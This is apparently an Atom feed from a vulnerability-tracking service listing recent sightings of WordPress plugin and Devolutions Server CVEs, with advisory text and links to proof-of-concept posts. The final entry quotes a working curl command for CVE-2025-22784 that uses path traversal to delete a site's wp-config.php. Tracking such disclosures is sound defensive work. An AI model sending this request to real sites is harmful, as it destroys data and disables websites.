<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-06T17:22:25.327931+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/95d41bd1-1e2d-44a1-bf06-6be6a78eb3db/export</id>
    <title>95d41bd1-1e2d-44a1-bf06-6be6a78eb3db</title>
    <updated>2026-05-06T17:22:25.561768+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "95d41bd1-1e2d-44a1-bf06-6be6a78eb3db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22788", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113833712622660574", "content": "", "creation_timestamp": "2025-01-15T18:10:09.684234Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/95d41bd1-1e2d-44a1-bf06-6be6a78eb3db/export"/>
    <published>2025-01-15T18:10:09.684234+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/726ea983-1e40-47ad-8d46-c8a2c9a0caa1/export</id>
    <title>726ea983-1e40-47ad-8d46-c8a2c9a0caa1</title>
    <updated>2026-05-06T17:22:25.561690+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "726ea983-1e40-47ad-8d46-c8a2c9a0caa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22788", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1852", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22788\n\ud83d\udd39 Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codexpert, Inc CoDesigner WooCommerce Builder for Elementor allows Stored XSS.This issue affects CoDesigner WooCommerce Builder for Elementor: from n/a through 4.7.17.2.\n\ud83d\udccf Published: 2025-01-15T15:23:08.555Z\n\ud83d\udccf Modified: 2025-01-15T19:28:26.601Z\n\ud83d\udd17 References:\n1. https://patchstack.com/database/wordpress/plugin/woolementor/vulnerability/wordpress-codesigner-plugin-4-7-17-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "creation_timestamp": "2025-01-15T19:55:24.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/726ea983-1e40-47ad-8d46-c8a2c9a0caa1/export"/>
    <published>2025-01-15T19:55:24+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/0200dd84-09ea-4185-a0a6-8d2ec6533af6/export</id>
    <title>0200dd84-09ea-4185-a0a6-8d2ec6533af6</title>
    <updated>2026-05-06T17:22:25.561619+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "0200dd84-09ea-4185-a0a6-8d2ec6533af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22783", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11798", "content": "#exploit\n1. CVE-2025-22783:\nSQLi in WP SEO Plugin\nhttps://github.com/DoTTak/CVE-2025-22783\n\n2. Messenger Group Call DoS for iOS\nhttps://s11research.com/posts/Messenger-Group-Call-DoS-for-iOS", "creation_timestamp": "2025-02-12T09:14:08.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/0200dd84-09ea-4185-a0a6-8d2ec6533af6/export"/>
    <published>2025-02-12T09:14:08+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/63c0c1cf-4dc6-4095-b123-b707d8c54c4a/export</id>
    <title>63c0c1cf-4dc6-4095-b123-b707d8c54c4a</title>
    <updated>2026-05-06T17:22:25.561540+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "63c0c1cf-4dc6-4095-b123-b707d8c54c4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22783", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/6587", "content": "#exploit\n1. CVE-2025-22783:\nSQLi in WP SEO Plugin\nhttps://github.com/DoTTak/CVE-2025-22783\n\n2. Messenger Group Call DoS for iOS\nhttps://s11research.com/posts/Messenger-Group-Call-DoS-for-iOS", "creation_timestamp": "2025-02-12T12:33:02.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/63c0c1cf-4dc6-4095-b123-b707d8c54c4a/export"/>
    <published>2025-02-12T12:33:02+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/25f32374-2894-4bf2-8dd1-b832bea12f0b/export</id>
    <title>25f32374-2894-4bf2-8dd1-b832bea12f0b</title>
    <updated>2026-05-06T17:22:25.561472+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "25f32374-2894-4bf2-8dd1-b832bea12f0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22783", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/2384", "content": "#exploit\n1. CVE-2025-22783:\nSQLi in WP SEO Plugin\nhttps://github.com/DoTTak/CVE-2025-22783\n\n2. Messenger Group Call DoS for iOS\nhttps://s11research.com/posts/Messenger-Group-Call-DoS-for-iOS", "creation_timestamp": "2025-02-12T12:33:03.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/25f32374-2894-4bf2-8dd1-b832bea12f0b/export"/>
    <published>2025-02-12T12:33:03+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/1f0e1260-cbfd-452f-9bc0-95fcd88b723c/export</id>
    <title>1f0e1260-cbfd-452f-9bc0-95fcd88b723c</title>
    <updated>2026-05-06T17:22:25.561399+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "1f0e1260-cbfd-452f-9bc0-95fcd88b723c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22785", "type": "seen", "source": "https://infosec.exchange/users/random_robbie/statuses/114059632221945261", "content": "", "creation_timestamp": "2025-02-24T15:44:28.948911Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/1f0e1260-cbfd-452f-9bc0-95fcd88b723c/export"/>
    <published>2025-02-24T15:44:28.948911+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/2c1d3a96-b79f-4506-bac9-37ff1b34e571/export</id>
    <title>2c1d3a96-b79f-4506-bac9-37ff1b34e571</title>
    <updated>2026-05-06T17:22:25.561321+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "2c1d3a96-b79f-4506-bac9-37ff1b34e571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-2278", "type": "seen", "source": "https://t.me/cvedetector/20207", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-2278 - Devolutions Server Information Disclosure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-2278 \nPublished : March 13, 2025, 1:15 p.m. | 40\u00a0minutes ago \nDescription : Improper access control in temporary access requests and checkout requests endpoints in Devolutions Server 2024.3.13 and earlier allows an authenticated user to access information about these requests via a known request ID. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"13 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-13T15:36:59.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/2c1d3a96-b79f-4506-bac9-37ff1b34e571/export"/>
    <published>2025-03-13T15:36:59+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/8b2790df-fc1b-413a-b17b-525e3982323b/export</id>
    <title>8b2790df-fc1b-413a-b17b-525e3982323b</title>
    <updated>2026-05-06T17:22:25.561246+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "8b2790df-fc1b-413a-b17b-525e3982323b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22783", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llmqine4qm2x", "content": "", "creation_timestamp": "2025-03-30T21:02:03.044262Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/8b2790df-fc1b-413a-b17b-525e3982323b/export"/>
    <published>2025-03-30T21:02:03.044262+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/22199ae2-87ea-499c-91c5-c642c1f1e032/export</id>
    <title>22199ae2-87ea-499c-91c5-c642c1f1e032</title>
    <updated>2026-05-06T17:22:25.561137+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "22199ae2-87ea-499c-91c5-c642c1f1e032", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22789", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lpk2zad6yx24", "content": "", "creation_timestamp": "2025-05-19T17:13:00.520148Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/22199ae2-87ea-499c-91c5-c642c1f1e032/export"/>
    <published>2025-05-19T17:13:00.520148+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/1e8fa46f-90da-4cd2-94b0-565c3cae5272/export</id>
    <title>1e8fa46f-90da-4cd2-94b0-565c3cae5272</title>
    <updated>2026-05-06T17:22:25.558790+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "1e8fa46f-90da-4cd2-94b0-565c3cae5272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-22784", "type": "published-proof-of-concept", "source": "https://t.me/liwaamohammad/5086", "content": "CVE-2025-22784\n\n- arbitary file deletion\n\n- role: subscribe level\n\ncurl --path-as-is -i -s -k -X 'POST' \\\n    -b '' \\\n    --data-binary 'bgc-delete-submit=test&amp;amp;delete=../../../../wp-config.php' \\\n    '/wp-admin/options-general.php?page=bg-control'\n\n#poc #exploit", "creation_timestamp": "2026-03-19T04:02:42.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/1e8fa46f-90da-4cd2-94b0-565c3cae5272/export"/>
    <published>2026-03-19T04:02:42+00:00</published>
  </entry>
</feed>
